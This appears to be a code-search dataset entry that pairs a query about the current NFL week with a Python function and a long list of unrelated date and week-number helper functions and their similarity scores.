week1_start).days // 7 + 1", "def WeekCount(year):\n weekday = DayOfWeek(year, 1, 1)\n if weekday == 4:\n return 53\n elif weekday == 3 and LeapYear(year):\n return 53\n else:\n return 52", "def current_week_number(date=datetime.datetime.now()):\n return int(date.strftime(\"%W\"))", "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum = TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def get_week_days(year, week):\n d = dt.date(year, 1, 1)\n if(d.weekday() > 3):\n d = d + dt.timedelta(7 - d.weekday())\n else:\n d = d - dt.timedelta(d.weekday())\n dlt = dt.timedelta(days = (week - 1) * 7)\n return d + dlt #, d + dlt + dt.timedelta(days = 6)", "def nflweek(self, irc, msg, args, optlist, optweek):\n \n url = self._b64decode('aHR0cDovL3MzLmFtYXpvbmF3cy5jb20vbmZsZ2MvYWxsU2NoZWR1bGUuanM=')\n \n usePre, useNext, outputWeek = False, False, False\n for (option, arg) in optlist:\n if option == 'pre':\n usePre = True\n \n if optweek:\n if optweek == \"next\":\n useNext = True\n elif optweek.isdigit():\n if usePre: \n if 1 <= int(optweek) <= 4:\n outputWeek = \"Preseason Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Preseason week number must be between 1 and 4.\")\n return\n else:\n if 1 <= int(optweek) <= 17:\n outputWeek = \"Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Week must be between 1-17\")\n return \n\n try:\n req = urllib2.Request(url)\n html = (urllib2.urlopen(req)).read()\n except:\n irc.reply(\"Failed to open: %s\" % url)\n return\n \n jsondata = json.loads(html)\n\n week = jsondata.get('week', None) # work with the week data so we know where we are.\n\n if week is None:\n irc.reply(\"Failed to load schedule.\")\n return\n\n currentWeekName = week.get('current', {'current': None}).get('weekName', None) \n nextWeekName = week.get('next', {'next': None}).get('weekName', None) \n\n if currentWeekName is None:\n irc.reply(\"Cannot figure out the current week.\")\n return\n\n games = jsondata.get('content', None) # data in games.\n \n if games is None:\n irc.reply(\"Failed to load the games data.\")\n return\n \n if outputWeek:\n games = [item['games'] for item in games if item['weekName'] == outputWeek]\n weekOutput = outputWeek\n elif useNext:\n games = [item['games'] for item in games if item['weekName'] == nextWeekName]\n weekOutput = nextWeekName\n else:\n games = [item['games'] for item in games if item['weekName'] == currentWeekName]\n weekOutput = currentWeekName\n \n append_list = []\n\n for games in games:\n for t in games:\n awayTeam = self._translateTeam('team', 'nid', t['awayTeamId'])\n homeTeam = self._translateTeam('team', 'nid', t['homeTeamId'])\n append_list.append(\"[\" + t['date']['num'] + \"] \" + awayTeam + \"@\" + homeTeam + \" \" + t['date']['time'])\n \n descstring = string.join([item for item in append_list], \" | \")\n output = \"{0} :: {1}\".format(ircutils.bold(weekOutput), descstring)\n \n irc.reply(output)", "def week(self):\n if self._week.lower() == 'wild card':\n return WILD_CARD\n if self._week.lower() == 'division':\n return DIVISION\n if self._week.lower() == 'conf. champ.':\n return CONF_CHAMPIONSHIP\n if self._week.lower() == 'superbowl':\n return SUPER_BOWL\n return self._week", "def getWeeks(year):\n url = \"http://www.boxofficemojo.com/weekend/?yr=%d\" % year\n src = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(src, 'html.parser')\n chart = soup.find(border=\"0\", cellspacing=\"1\", cellpadding=\"5\")\n data = parseTable(chart)\n weeks = [int(row[-1]) for row in data[1:]]\n return weeks", "def date_to_day_of_week(date):\n return date.weekday()", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def get_weekday_number(date):\n return date.strftime('%w')", "def day_of_week(day, month, year):\n bias = (14 - month) // 12\n m_year = year - bias\n mth = month + 12 * bias - 2\n return (day + m_year + m_year // 4 - m_year // 100 + m_year // 400 + (31 * mth) // 12) % 7", "def week_range(date):\n # isocalendar calculates the year, week of the year, and day of the week.\n # dow is Mon = 1, Sat = 6, Sun = 7\n year, week, dow = date.isocalendar()\n\n # Find the first day of the week.\n if dow == 7:\n # Since we want to start with Sunday, let's test for that condition.\n start_date = date\n else:\n # Otherwise, subtract `dow` number days to get the first day\n start_date = date - timedelta(dow)\n\n return start_date, start_date + timedelta(6)", "def weekNumber(self): # real signature unknown; restored from __doc__\r\n pass", "def next_week_start(iso_date: Optional[str] = None) -> date:\n if iso_date:\n current_date = date.fromisoformat(iso_date)\n else:\n current_date = date.today()\n\n days_until_monday = 7 - current_date.weekday()\n\n candidate_start = current_date + timedelta(days=days_until_monday)\n while candidate_start in holidays.US():\n candidate_start += timedelta(days=1)\n\n return candidate_start", "def weekly():", "def first_day_of_year(year):\n year -= 1\n return (year + (year // 4) - (year // 100) + (year // 400) + 1) % NUM_DAYS_IN_WEEK", "def GetWeekDay(self):\n if self.day is None:\n if self.week:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n self.week,\n None)\n elif self.month is None:\n if self.year is None:\n return (self.century, None, None, None, None)\n else:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n None,\n None)\n else:\n raise DateTimeError(\"can't get week day with month precision\")\n else:\n century, year, ordinalDay = self.GetOrdinalDay()\n year += century * 100\n if LeapYear(year):\n yearLength = 366\n else:\n yearLength = 365\n weekday = DayOfWeek(year, self.month, self.day)\n thursday = ordinalDay + 4 - weekday\n if thursday < 1:\n # Thursday this week was actually last year, and so we are\n # part of the last calendar week of last year too.\n # may return year==0\n year -= 1\n week = WeekCount(year)\n elif thursday > yearLength:\n # Thursday this week is actually next year, and so we are\n # part of the first calendar week of next year too.\n # may return century=100\n year += 1\n week = 1\n else:\n # We are part of this year, but which week?\t Jan 4th is always\n # part of the first week of the year, so we calculate the ordinal\n # value of the Monay that began that week\n yearBase = 5 - DayOfWeek(year, 1, 4)\n week = (ordinalDay - yearBase) // 7 + 1\n return year // 100, (year % 100) // 10, (year % 10), week, weekday", "def _DayNumToWeekdayNum(daynum):\n return (daynum + _WEEKDAY_BASE) % NUM_WEEKDAYS", "def get_next_week(self, startdate):\n dow_today = int(datetime.datetime.strftime(startdate, '%w'))\n days_until_sunday = 7 - ((dow_today + 7) % 7)\n #days_until_sunday = 7 - (dow_today + 1)\n sunday = startdate + datetime.timedelta(days=days_until_sunday)\n following_saturday = sunday + datetime.timedelta(days=6)\n next_week = (sunday, following_saturday)\n return next_week", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def DayOfWeek(year, month, day):\n num = year * 365\n num = num + year // 4 + 1\n num = num - (year // 100 + 1)\n num = num + year // 400 + 1\n if month < 3 and LeapYear(year):\n num = num - 1\n return (num + MONTH_OFFSETS[month - 1] + day + 4) % 7 + 1", "def sacred_wednesdays(g_year):\n return sacred_wednesdays_in_range(GregorianDate.year_range(g_year))", "def latest_season_before(date):\n\tif date.month < 9:\n\t\treturn date.year - 1\n\treturn date.year", "def current_week(self):\n\n if not self.iso_equal() and self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 2\n if not self.iso_equal() or self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 1 \n return self.time_stamp_iso[1]", "def date_to_week(y, m, d):\r\n return datetime.datetime(y, m, d).strftime(r'%YW%W')", "def WEEKDAY(date, return_type=1):\n if return_type not in _weekday_type_map:\n raise ValueError(\"Invalid return type %s\" % (return_type,))\n (first, index) = _weekday_type_map[return_type]\n return (_make_datetime(date).weekday() - first) % 7 + index", "def get_week_date():\n return timezone.now()+timezone.timedelta(days=6)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def date_day_of_week(date):\n day_of_week = date.strftime('%A')\n return day_of_week", "def nineteen():\r\n \r\n # Julian dates for January 1, 1901 and January 1, 2001\r\n start = 2415385\r\n end = 2451910\r\n \r\n years = 100\r\n months = 12\r\n monthDays = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n leapDays = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\r\n \r\n dateRange = end - start\r\n \r\n total = 0\r\n sundays = 0\r\n \r\n for year in range(years):\r\n for i in range(months):\r\n a = i + 1\r\n if (year + 1) % 4 == 0: \r\n for j in range(leapDays[a]):\r\n total += 1\r\n if j == 0 and total % 7 == 6:\r\n sundays += 1\r\n else:\r\n for j in range(monthDays[a]):\r\n total += 1\r\n if j == 0 and total % 7 == 6:\r\n sundays += 1 \r\n \r\n return sundays", "def getSeason(date):\n\n date = validate.timestamp(date)\n day = date.dayofyear\n leap_year = int(date.is_leap_year)\n\n spring = numpy.arange(80, 172) + leap_year\n summer = numpy.arange(172, 264) + leap_year\n autumn = numpy.arange(264, 355) + leap_year\n\n if day in spring:\n season = \"spring\"\n elif day in summer:\n season = \"summer\"\n elif day in autumn:\n season = \"autumn\"\n else:\n season = \"winter\"\n\n return season", "def current_week() -> int:\n now = datetime.now()\n return get_week_from_date(now)", "def dow(self):\n comparator = Date(11, 12, 2014) # known to be a 'Wednesday'\n DOW = ['Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday', 'Monday', 'Tuesday']\n diff = self.diff(comparator)\n return DOW[diff % 7]", "def day_of_week(self):\n day_of_week_names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday']\n diff = self.diff(Date(1, 1, 1970)) + 3\n while diff < 0:\n diff += 7\n print(day_of_week_names[diff % 7])", "def get_week(time_index):\n return np.array(time_index.week).reshape(-1,1)", "def gen_weeklyFrequency(self):\n\n if len(self.fields) == 0:\n return None\n\n if self.validator.validate(self.fields) == False:\n return None\n\n weeklyFrequency = 0\n dayFields = ['day1','day2','day3','day4','day5','day6','day7']\n for dayField in dayFields:\n if dayField in self.fields:\n if self.fields[dayField] == True:\n weeklyFrequency += 1\n\n return weeklyFrequency", "def get_today_week_number(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[1]", "def get_week_range(year, week):\n first_day = datetime.strptime(f\"{year}-W{week}-1\", \"%Y-W%W-%w\").date()\n last_day = first_day + timedelta(days=6)\n return first_day, last_day", "def dow(values, feature, parent): \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None", "def dow(values, feature, parent): \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None", "def week_fromordinal(cls, ordinal):\n return int(math.floor(cls.day_fromordinal(ordinal) / 7)) + 1", "def get_day_of_week(year: int, dow: int) -> List[date]:\n new_year = date(year, 1, 1)\n start_date = new_year + timedelta(days=dow - new_year.weekday())\n start_date = start_date + timedelta(days=7) if start_date < new_year else start_date\n\n dates = []\n while start_date.year == year:\n dates.append(start_date)\n start_date += timedelta(days=7)\n return dates", "def convert_date(year: str, week: str):\n date = datetime.fromisocalendar(int(year), int(week), 1)\n return date.strftime(\"%m/%d/%YZ\")", "def date_to_day_of_week(year, month, day):\n # Calculate the day offset from Jan, 1 in the specified year.\n day_num = date_to_day_of_year(year, month, day)\n\n is_pre_2k = year < 2000\n if is_pre_2k:\n # Calculate the number of days from the end of the year.\n num_days = days_in_year(year) - day_num + 1\n start, step = 1999, -1\n else:\n # Calculate the number of days from the beginning of the year.\n num_days = day_num - 1\n start, step = 2000, 1\n\n for _year in range(start, year, step):\n num_days += days_in_year(_year)\n\n # Add the number of days to the day number for Jan 1, 2000 modulus 7\n # to get the current day number.\n if is_pre_2k:\n num_days = -num_days\n\n return (JAN_1_2000_DAY_NUM + num_days) % 7", "def getCurrentWeek(self):\n return self.wcount % 48", "def test_date_accept_this_week(self):\n spi_search = \"find date this week\"\n inv_search = \"year:\" + datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(datetime.datetime.today().isoweekday()%7)), '%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def _labor_day(year):\n day = datetime(year, 9, 1)\n delta = timedelta(days=1)\n while day.weekday() != 0:\n day += delta\n return day", "def schedule_url(year, stype, week):\n xmlurl = 'http://www.nfl.com/ajax/scorestrip?'\n if stype == 'POST':\n week += 17\n if week == 21: # NFL.com you so silly\n week += 1\n return '%sseason=%s&seasonType=%s&week=%s' % (xmlurl, year, stype, week)", "def get_current_day_week_number(week_delta=0):\n return (datetime.today() + timedelta(weeks=week_delta)).isocalendar()[1]", "def return_football_season(date=datetime.datetime.today()):\n date_aux = subtract_months(date, 6)\n beginning_year = str(date_aux.year)\n ending_year = date_aux.year + 1\n ending_year = str(ending_year)[-2:]\n season = ''.join([beginning_year, '-', ending_year])\n return season", "def dateTimetoWeekend(dateList, startYear):\n weekHash = dateList.dt.week + 52 * (dateList.dt.year - startYear)\n return weekHash", "def __init__(self, y, w):\n for d in xrange(-10, 370):\n date = datetime.date(y, 1, 1) + datetime.timedelta(d)\n if date.isocalendar() == (y, w, 1):\n date_a = date\n break\n else:\n raise ValueError(\"Invalid week\")\n date_b = date_a + datetime.timedelta(7)\n super(Week, self).__init__(date_a, date_b)", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def forecast_weekly():\n forecast = get_forecast()\n daily = forecast.daily()\n return daily.summary", "def weeks_of_the_month(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[str, 'WeekNumber']]]]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def get_week_end(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof + TimeDelta(days=6 - (asof.isoweekday() - 1) % 7)", "def days_to_weeks(list_of_days):\n all_weeks = []\n for day in list_of_days:\n that_week = day.isocalendar()\n if (\n len(all_weeks) == 0\n or all_weeks[-1].year != that_week.year\n or all_weeks[-1].week != that_week.week\n ):\n all_weeks.append(that_week)\n return list(map(lambda iso: \"{}-{}\".format(iso.year, iso.week), all_weeks))", "def get_weekday(self):\n originDate = Date(1900, 1, 1)\n return WEEKDAYS[originDate.days_since(self) % 7]", "def WEEKDAY(\n serial_number: func_xltypes.XlNumber,\n return_type: func_xltypes.XlNumber = None\n) -> func_xltypes.XlNumber:\n\n date = utils.number_to_datetime(int(serial_number))\n\n if return_type is None:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 1:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n # weekday() is 0 based, starting on a Monday\n elif int(return_type) == 2:\n # Numbers 1 (Monday) through 7 (Sunday)\n weekDays = (1, 2, 3, 4, 5, 6, 7)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 3:\n # Numbers 0 (Monday) through 6 (Sunday)\n weekDays = (0, 1, 2, 3, 4, 5, 6)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 11:\n # Numbers 1 (Monday) through 7 (Sunday)\n weekDays = (1, 2, 3, 4, 5, 6, 7)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 12:\n # Numbers 1 (Tuesday) through 7 (Monday)\n weekDays = (7, 1, 2, 3, 4, 5, 6)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 13:\n # Numbers 1 (Wednesday) through 7 (Tuesday)\n weekDays = (6, 7, 1, 2, 3, 4, 5)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 14:\n # Numbers 1 (Thursday) through 7 (Wednesday)\n weekDays = (5, 6, 7, 1, 2, 3, 4)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 15:\n # Numbers 1 (Friday) through 7 (Thursday)\n weekDays = (4, 5, 6, 7, 1, 2, 3)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 16:\n # Numbers 1 (Saturday) through 7 (Friday)\n weekDays = (3, 4, 5, 6, 7, 1, 2)\n return weekDays[date.weekday()]\n\n elif int(return_type) == 17:\n # Numbers 1 (Sunday) through 7 (Saturday)\n weekDays = (2, 3, 4, 5, 6, 7, 1)\n return weekDays[date.weekday()]\n\n else:\n raise xlerrors.NumExcelError(\n f\"return_type needs to be omitted or one of 1, 2, 3, 11, 12, 13,\\\n 14, 15, 16 or 17. You supplied {return_type}\")", "def current_season_phase():\n _update_week_number()\n return _cur_season_phase", "def findWeekend(str):\n return int(re.search(\"(?<=wknd=)\\d*\", str)[0])", "def next_seven_day(self):\n today = datetime.date.today()\n week_next = today + datetime.timedelta(days=7)\n return week_next.strftime('%Y-%m-%d')", "def day_of_week(date: datetime) -> str:\n weekday = date.weekday()\n return calendar.day_name[weekday]", "def first_monday_of_week(year, week):\n weekyear = \"{} {} 1\".format(year, week)\n return time.asctime(time.strptime(weekyear, \"%Y %U %w\"))", "def isocalendar(self):\n year = self._year\n week1monday = _isoweek1monday(year)\n today = _ymd2ord(self._year, self._month, self._day)\n # Internally, week and day have origin 0\n week, day = divmod(today - week1monday, 7)\n if week < 0:\n year -= 1\n week1monday = _isoweek1monday(year)\n week, day = divmod(today - week1monday, 7)\n elif week >= 52:\n if today >= _isoweek1monday(year + 1):\n year += 1\n week = 0\n return _IsoCalendarDate(year, week + 1, day + 1)", "def week(self) -> Index:\n warnings.warn(\n \"`week` is deprecated in 3.5.0 and will be removed in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.week)", "def weekday(self):\n\n return func.extract('dow', self.start_date) + 1", "def twenty_seventeen():\n return 2017", "def current_season():\n td = datetime.datetime.today()\n if td.month > 8:\n return td.year\n return td.year - 1", "def fromisocalendar(cls, year, week, day):\n # Year is bounded this way because 9999-12-31 is (9999, 52, 5)\n if not MINYEAR <= year <= MAXYEAR:\n raise ValueError(f\"Year is out of range\")\n\n if not 0 < week < 53:\n out_of_range = True\n\n if week == 53:\n # ISO years have 53 weeks in them on years starting with a\n # Thursday and leap years starting on a Wednesday\n first_weekday = _ymd2ord(year, 1, 1) % 7\n if first_weekday == 4 or (first_weekday == 3 and _is_leap(year)):\n out_of_range = False\n\n if out_of_range:\n raise ValueError(f\"Invalid week: {week}\")\n\n if not 0 < day < 8:\n raise ValueError(f\"Invalid weekday (range is [1, 7])\")\n\n # Now compute the offset from (Y, 1, 1) in days:\n day_offset = (week - 1) * 7 + (day - 1)\n\n # Calculate the ordinal day for monday, week 1\n day_1 = _isoweek1monday(year)\n ord_day = day_1 + day_offset\n\n return cls(*_ord2ymd(ord_day))", "def Day_of_week(day, month, year):\r\n if year % 4 == 0 and (year % 400 == 0 or year % 100 != 0):\r\n doomsday = [11, 29, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n else:\r\n doomsday = [10, 28, 21, 4, 9, 6, 11, 8, 5, 10, 7, 12]\r\n exact_day = ((day - doomsday[month-1]) + Dooms_day(year)) % 7\r\n character_day = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \r\n \"Friday\", \"Saturday\"]\r\n return character_day[exact_day]", "def day_of_week(dt):\n cday = dt\n mday = 2\n uday = cday.isocalendar()[2] + mday\n try:\n if uday > 7:\n CURRDAY = uday - 7\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week>7 : \", CURRDAY)\n else:\n CURRDAY = uday\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week : \", CURRDAY)\n return CURRDAY\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700;SCHEDULE ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def dateweek(line, date):\r\n\tindex = datetime.weekday(date)\r\n\tdateweek = '%s%s%s' % (date.day, cn2en.DATE_WEEK, cn2en.WEEKDAYS[index])\r\n\t\r\n\treturn dateweek == line", "def get_next_monday(date):\n return date + datetime.timedelta(days=-date.weekday(), weeks=1)", "def weeks_of_the_month(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def day_of_week():\n return calendar.day_name[datetime.date.today().weekday()]", "def week_of_month(dt):\n\n first_day = dt.replace(day=1)\n\n dom = dt.day\n adjusted_dom = dom + first_day.weekday()\n\n return int(ceil(adjusted_dom/7.0))", "def get_weekdays(date: str) -> list:\n parsed_date = parser.parse(date)\n day_of_week = parsed_date.weekday()\n first_day_of_week = parsed_date - datetime.timedelta(days=day_of_week)\n\n return holiday.create_date_range(first_day_of_week, 7)", "def day_of_week_for_start_day(self):\n import calendar\n\n day = self.idfobjects[\"RUNPERIOD\"][0][\"Day_of_Week_for_Start_Day\"]\n\n if day.lower() == \"sunday\":\n return calendar.SUNDAY\n elif day.lower() == \"monday\":\n return calendar.MONDAY\n elif day.lower() == \"tuesday\":\n return calendar.TUESDAY\n elif day.lower() == \"wednesday\":\n return calendar.WEDNESDAY\n elif day.lower() == \"thursday\":\n return calendar.THURSDAY\n elif day.lower() == \"friday\":\n return calendar.FRIDAY\n elif day.lower() == \"saturday\":\n return calendar.SATURDAY\n else:\n return 0", "def meetup_day(year, month, day_of_week, day_occurrence):\n \n cal = calendar.monthcalendar(year, month)\n day_of_week_index = days_of_week[day_of_week]\n \n not_teenth = day_occurrence != 'teenth'\n day_is_in_first_week = cal[0][day_of_week_index] != 0\n \n if not_teenth and day_is_in_first_week:\n week_index = week_indices[day_occurrence]\n \n elif not_teenth and not day_is_in_first_week:\n week_index = week_indices[day_occurrence] + 1\n \n else:\n for i in range(len(cal)):\n if cal[i][day_of_week_index] >= 10:\n week_index = i\n break\n\n date = cal[week_index][day_of_week_index]\n return datetime.date(year, month, date)", "def MLK(year):\n\n day = datetime.date(year, 1, 1)\n count = 0\n while True:\n if day.weekday() == 0:\n count += 1\n if count == 3:\n return day\n day += datetime.timedelta(days=1)", "def get_current_week_range(self, currdate):\n dow_start = datetime.datetime.strftime(currdate, '%w')\n if dow_start == '0':\n week_start = currdate\n else:\n week_start = self.get_previous_byday('Sunday', currdate)\n\n week_end = week_start + datetime.timedelta(days=6)\n return (week_start, week_end)", "def date_with_day_of_week_appended(mydate): \n import datetime\n month, day, year = (int(x) for x in mydate.split('/')) \n shortened_year = abs(year) % 100 \n day_of_week = datetime.date(year, month, day).strftime(\"%A\")\n return \"%s/%s/%s %s\" % (month,day,shortened_year, day_of_week)", "def find_date(startdate, weekday, weeknumber):\n import datetime\n # The +1 makes this match up with linux times (day 1 = Monday)\n daysahead = weekday - (startdate.weekday() + 1)\n if daysahead < 0:\n # Target day already happened this week\n daysahead += 7\n # Add 7 days for each Week Of Month we want - but 'This' week is week 1\n daysahead += 7 * (weeknumber - 1)\n return startdate + datetime.timedelta(daysahead)", "def iso_year_start(self, iso_year):\n fourth_jan = datetime.date(iso_year, 1, 4)\n delta = datetime.timedelta(fourth_jan.isoweekday() - 1)\n return fourth_jan - delta", "def dayofweek(day, month, year, formatresult=True):\n if formatresult is False:\n return calendar.weekday(year, month, day) + 1\n days = {\n 0: 'Monday',\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\"\n }\n return days[calendar.weekday(year, month, day)]", "def evening_twilight_6(self, date=None):\n self.site.horizon = self.horizon6\n self._set_site_date(date)\n r_date = self.site.next_setting(self.sun)\n r_date = self.date_to_local(r_date.datetime())\n return r_date", "def nth_dow_to_day(tupel, y):\r\n m = tupel[0]\r\n dow = tupel[1]\r\n n = tupel[2]\r\n\r\n if dow == 7:\r\n dow = 0\r\n\r\n first_dow = date_to_dow(y, m, 1) # the dow of the first of the month\r\n shift = dow - first_dow\r\n if shift < 0:\r\n shift += 7\r\n\r\n return shift + (7 * n) - 6", "def compute(year_N):\n\n sunday_counts = 0 \n\n # 1st of month on Jan 1901 is a Tuesday \n # variable keeps track of the first of month for the current month \n first_of_month = 2\n # 1 - Mon, 2 - Tuesday, 3 - Wed ...\n current_month = 1 \n year = 1901\n # Jan - 1 . One-based indexing \n\n \n while year <= year_N:\n \n # determines whether the year is a leap year \n if year % 4 == 0 and year % 100 != 0:\n leapYear = True \n elif year % 400 == 0:\n leapYear = True \n else:\n leapYear = False \n\n # loops through every month and keeps track of first_of_month \n # if first of month is a Sunday (7), increment sundays count \n while current_month <= 12:\n \n # if first_of_month of current month is a sunday, increment sundays count\n if first_of_month == 7:\n sunday_counts += 1 \n # first of month only takes value from 1 to 7 \n elif first_of_month > 7:\n first_of_month -= 7 \n\n if current_month in [4, 6, 9, 11]:\n # months with 30 days \n # next month's first of month will be 2 days of the week later. \n # E.g. April's 1st of month is Wed, May's 1st of month will be Fri \n first_of_month_increment = 2 # 30 % 28\n elif current_month == 2:\n # february \n if leapYear:\n first_of_month_increment = 1 \n else: \n first_of_month_increment = 0\n else:\n # months with 31 days \n first_of_month_increment = 3 # 31 % 28 \n\n # next month values \n current_month += 1 \n first_of_month += first_of_month_increment\n\n # Finished looping from January of year to December\n # next year values:\n year += 1 \n current_month = 1 \n # first_of_month value will stay the same \n\n return sunday_counts" ]
[ "0.7253059", "0.6891157", "0.68909645", "0.6705168", "0.66147095", "0.6535417", "0.63276374", "0.6250827", "0.62457407", "0.61644757", "0.6102457", "0.60741466", "0.59655815", "0.59634364", "0.59619147", "0.5926681", "0.5889611", "0.5864661", "0.5860158", "0.5819684", "0.58102256", "0.5803096", "0.5769433", "0.5759181", "0.57462853", "0.5728721", "0.5720337", "0.5683695", "0.5683139", "0.56718516", "0.5663745", "0.5649805", "0.5596048", "0.5590334", "0.5570848", "0.5535454", "0.5533866", "0.5523761", "0.5520232", "0.549952", "0.5480408", "0.54593253", "0.5436293", "0.54258525", "0.54022807", "0.54000765", "0.5377228", "0.5374396", "0.5369371", "0.53628534", "0.53628534", "0.53498155", "0.5336595", "0.5325473", "0.53230524", "0.53215176", "0.5319168", "0.53145796", "0.5306232", "0.5298761", "0.5277226", "0.5263977", "0.52533305", "0.5250124", "0.52451706", "0.52408165", "0.5239411", "0.5236587", "0.5235104", "0.52257425", "0.5216507", "0.5197355", "0.51894975", "0.51765555", "0.5173755", "0.51552624", "0.513837", "0.5136225", "0.5130756", "0.5127778", "0.51170063", "0.511581", "0.5110726", "0.51026076", "0.5100001", "0.50903034", "0.50869054", "0.5083932", "0.50765246", "0.50751215", "0.5073357", "0.50726664", "0.5072107", "0.5071311", "0.505879", "0.50564927", "0.50554806", "0.5041686", "0.50354624", "0.50185895" ]
0.7307077
0
Get current NFL week (ESPN scoring period)
def current_week() -> int: now = datetime.now() return get_week_from_date(now)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current_week(self):\n\n if not self.iso_equal() and self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 2\n if not self.iso_equal() or self.time_stamp.weekday() == 6:\n return self.time_stamp_iso[1] + 1 \n return self.time_stamp_iso[1]", "def weekly():", "def getCurrentWeek(self):\n return self.wcount % 48", "def get_week_date():\n return timezone.now()+timezone.timedelta(days=6)", "def weekNumber(self): # real signature unknown; restored from __doc__\r\n pass", "def week(self):\n if self._week.lower() == 'wild card':\n return WILD_CARD\n if self._week.lower() == 'division':\n return DIVISION\n if self._week.lower() == 'conf. champ.':\n return CONF_CHAMPIONSHIP\n if self._week.lower() == 'superbowl':\n return SUPER_BOWL\n return self._week", "def get_current_week(self):\n result = self._method_call(\"CurrentWeek\")\n return int(result)", "def week(self):\n J = self.JulianDay()\n d4 = (J + 31741 - (J % 7)) % 146097 % 36524 % 1461\n L = d4 // 1460\n d1 = ((d4 - L) % 365) + L\n return d1 // 7 + 1", "def get_current_day_week_number(week_delta=0):\n return (datetime.today() + timedelta(weeks=week_delta)).isocalendar()[1]", "def reporting_week(self):\n\n print(\"Week Numbers:\")\n print(self.time_stamp)\n print(self.time_stamp_iso)\n print(\"Current = {}\".format(self.current_week()))\n print(\"Reporting = {}\".format(self.current_week() - 1))", "def get_today_week_number(self):\n\n today = date.today()\n iso_result = today.isocalendar()\n return iso_result[1]", "def nflweek(self, irc, msg, args, optlist, optweek):\n \n url = self._b64decode('aHR0cDovL3MzLmFtYXpvbmF3cy5jb20vbmZsZ2MvYWxsU2NoZWR1bGUuanM=')\n \n usePre, useNext, outputWeek = False, False, False\n for (option, arg) in optlist:\n if 